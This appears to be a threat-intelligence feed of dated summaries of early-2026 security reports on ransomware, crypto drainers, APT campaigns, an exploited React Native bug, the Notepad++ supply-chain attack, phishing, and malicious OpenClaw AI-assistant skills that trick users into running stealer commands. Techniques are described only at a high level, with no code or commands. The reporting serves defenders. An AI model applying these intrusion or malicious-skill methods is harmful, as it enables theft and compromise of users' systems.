Anatomy of a Russian Crypto Drainer Operation
released on 2026-02-04 @ 03:24:27 PM
A major cybercriminal operation called Rublevka Team has generated over $10 million through cryptocurrency theft since 2023. The group employs a network of social engineering specialists who direct victims to malicious pages impersonating legitimate crypto services. Using custom JavaScript scripts, they trick users into connecting wallets and authorizing fraudulent transactions. Rublevka Team's infrastructure is fully automated, offering affiliates access to tools for launching high-volume scams. Their model poses a growing threat to cryptocurrency platforms and brands, with potential for reputational and legal risks. The group's agility in rotating domains and targeting lower-cost chains like Solana undermines traditional fraud detection efforts.
341 Malicious Clawed Skills Found by the Bot They Were Targeting
released on 2026-02-04 @ 12:44:16 PM
A massive malware campaign dubbed ClawHavoc has been uncovered in the ClawHub marketplace, targeting OpenClaw bots and their users. An AI bot named Alex, working with security researcher Oren Yomtov, discovered 341 malicious skills, including 335 from a single campaign. The malware, identified as Atomic Stealer (AMOS), uses sophisticated techniques to evade detection and steal sensitive data. The attack exploits users' trust in AI assistants, potentially compromising personal and financial information. In response, a new tool called Clawdex has been developed to help bots and users scan for malicious skills before installation.
The Godfather of Ransomware? Inside Cartel Ambitions
released on 2026-02-04 @ 11:13:51 AM
DragonForce, a ransomware group that emerged in late 2023, has become a significant cyber threat. They employ a dual-extortion strategy, encrypting and exfiltrating data, and have targeted various sectors, particularly manufacturing and construction. The group offers a flexible ransomware-as-a-service platform with advanced features, supporting multiple platforms and encryption modes. DragonForce has announced a shift to a cartel model, allowing affiliates to create their own brands. They've also introduced automated registration for new affiliates and a 'Company Data Audit' service to enhance extortion campaigns. The group has engaged in conflicts with rival ransomware operations and claims to have formed a coalition with other major groups. While their connection to DragonForce Malaysia remains unsubstantiated, technical analysis reveals similarities with other ransomware families and sophisticated attack techniques.
Hundreds of Malicious Crypto Trading Add-Ons Found in Moltbot/OpenClaw
released on 2026-02-04 @ 11:13:50 AM
Almost 400 fake crypto trading add-ons in the Moltbot/OpenClaw AI assistant project have been discovered, potentially leading users to install information-stealing malware. These add-ons, known as skills, masquerade as cryptocurrency trading automation tools and target various platforms. The malicious skills share the same command-and-control infrastructure and use social engineering to convince users to execute commands that steal crypto assets. The supply chain attack relies on social engineering and on the absence of security review in the skills publication process. Security experts warn about the inherent risks of endpoint-native AI agents and emphasize the need for proper security controls and architectural design considerations.
Metro4Shell: Exploitation of React Native's Metro Server in the Wild
released on 2026-02-04 @ 11:13:50 AM
A vulnerability in React Native's Metro Server, dubbed Metro4Shell, has been exploited in the wild since December 21, 2025. The flaw allows unauthenticated remote attackers to execute arbitrary OS commands on Windows systems. Exploitation involves a multi-stage PowerShell-based loader delivered through cmd.exe, which disables Microsoft Defender, establishes a connection to an attacker-controlled host, and executes a downloaded binary. The attacks originated from multiple IP addresses and targeted both Windows and Linux systems. Despite ongoing exploitation, the vulnerability has not received widespread public acknowledgment, highlighting the gap between actual threats and recognized risks in cybersecurity.
Critical React Native Metro dev server bug under attack
released on 2026-02-04 @ 11:13:35 AM
A critical vulnerability in React Native's Metro development server is being actively exploited to deliver malware to Windows and Linux machines. The flaw, tracked as CVE-2025-11953, allows unauthenticated attackers to execute arbitrary commands through OS command injection. Researchers discovered exploitation attempts as early as December, with attacks disabling Microsoft Defender protections and delivering a Rust-based payload with anti-analysis features. Despite its severity and ongoing exploitation, the vulnerability has not received widespread public acknowledgment. The bug affects the React Native Community command line tool, a popular npm package with millions of weekly downloads, highlighting the potential impact on developer tooling and the need for increased awareness and security measures.
Notepad++ supply chain attack breakdown
released on 2026-02-03 @ 12:08:18 PM
The article details a sophisticated supply chain attack on Notepad++ that occurred from July to October 2025. Attackers compromised the update infrastructure, deploying various malicious payloads through three distinct infection chains. The attack targeted individuals and organizations in Vietnam, El Salvador, Australia, and the Philippines. The infection methods evolved over time, using NSIS installers, Metasploit downloaders, and Cobalt Strike Beacons. The attackers employed clever techniques to evade detection, including the abuse of legitimate software and the use of multiple C2 servers. The article provides a comprehensive timeline of the attack, describes the different execution chains, and offers guidance on detecting traces of the attack.
The Chrysalis Backdoor: A Deep Dive into Lotus Blossom's toolkit
released on 2026-02-03 @ 08:21:04 AM
Rapid7 Labs has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom, involving a new custom backdoor named Chrysalis. The attack compromised Notepad++ infrastructure to deliver the backdoor. Analysis revealed multiple custom loaders, including one using Microsoft Warbird for obfuscation. The Chrysalis backdoor has extensive capabilities for information gathering, file operations, and remote command execution. Additional artifacts found include Cobalt Strike beacons and Metasploit payloads. The campaign shows Lotus Blossom evolving its tactics, mixing custom and off-the-shelf tools with advanced obfuscation techniques to evade detection.
Infostealers without borders: macOS, Python stealers, and platform abuse
released on 2026-02-02 @ 10:44:54 PM
Infostealer threats are expanding beyond Windows, targeting macOS and leveraging cross-platform languages like Python. Recent campaigns use social engineering to deploy macOS-specific infostealers such as DigitStealer, MacSync, and AMOS. These stealers use fileless execution and native macOS utilities to harvest credentials and sensitive data. Python-based stealers are also on the rise, allowing attackers to quickly adapt and target diverse environments. Additionally, threat actors are abusing trusted platforms like WhatsApp and PDF converter tools to distribute malware such as Eternidade Stealer. These evolving threats blend into legitimate ecosystems and evade conventional defenses, posing significant risks to organizations across various operating systems and delivery channels.
Leveraging of CVE-2026-21509 in Operation Neusploit
released on 2026-02-02 @ 10:44:54 PM
A new campaign dubbed Operation Neusploit, attributed to the Russia-linked APT28 group, targets Central and Eastern European countries using specially crafted Microsoft RTF files to exploit CVE-2026-21509. The attack chain involves multi-stage infection, delivering malicious backdoors including MiniDoor, PixyNetLoader, and a Covenant Grunt implant. The campaign employs social engineering lures in multiple languages, server-side evasion techniques, and abuses the Filen API for command-and-control communications. The malware components utilize various persistence mechanisms, steganography, and anti-analysis techniques. The operation showcases APT28's evolving tactics, techniques, and procedures in weaponizing the latest vulnerabilities.
Fake Dropbox Phishing Campaign via PDF and Cloud Storage
released on 2026-02-02 @ 06:31:09 PM
A sophisticated phishing campaign has been detected that utilizes a multi-stage approach to evade detection. The attack begins with a procurement-themed email containing a PDF attachment. This PDF redirects victims to another PDF hosted on trusted cloud storage, which then leads to a fake Dropbox login page. The attackers exploit trusted platforms and harmless file formats to bypass security measures. The campaign uses social engineering tactics to harvest credentials, which are then exfiltrated to attacker-controlled infrastructure via Telegram. This method proves effective by leveraging legitimate business processes, trusted file types, and reputable cloud services to appear authentic and bypass automated security checks.
Quick, You Need Assistance!
released on 2026-02-02 @ 10:52:25 AM
A Microsoft Teams voice-phishing campaign leveraging Quick Assist, a remote administration tool, was tracked in September 2025. The campaign uses help desk scams to gain initial access, followed by user group enumeration and the execution of a PowerShell script to download a command and control payload. The attack employs AMSI bypass, encrypted communications, and a WebSocket-based remote access trojan. Multiple Microsoft 365 tenants with IT-related subdomains were used, along with various IPs and domains for C2 infrastructure. The campaign shows similarities to Storm-1811 and PhantomCaptcha activities, suggesting a complex cybercrime ecosystem. The attackers' ultimate goal may be ransomware deployment, although observed attempts were successfully blocked.